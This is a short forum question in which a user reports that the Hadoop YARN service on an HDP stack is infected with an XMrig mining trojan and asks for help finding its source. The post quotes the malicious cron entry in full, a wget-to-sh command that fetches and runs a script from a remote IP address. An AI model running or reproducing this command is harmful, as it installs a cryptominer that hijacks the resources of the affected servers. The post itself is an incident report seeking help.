# Yarn is impacted with XMrig miner trojan

Tags: amazon-ec2, cpu, hadoop-yarn, mining, trojan

HDP stack yarn  processor  infected  with XMrig  trojan, even If I use the kylo ex2  sandbox,  i get this trojan that take 100% of your  CPU.

yarn) CMD (wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1)

This is a cron, run by the yarn user and generated files and loads on the server

trying to find the root file.  any help is appreciated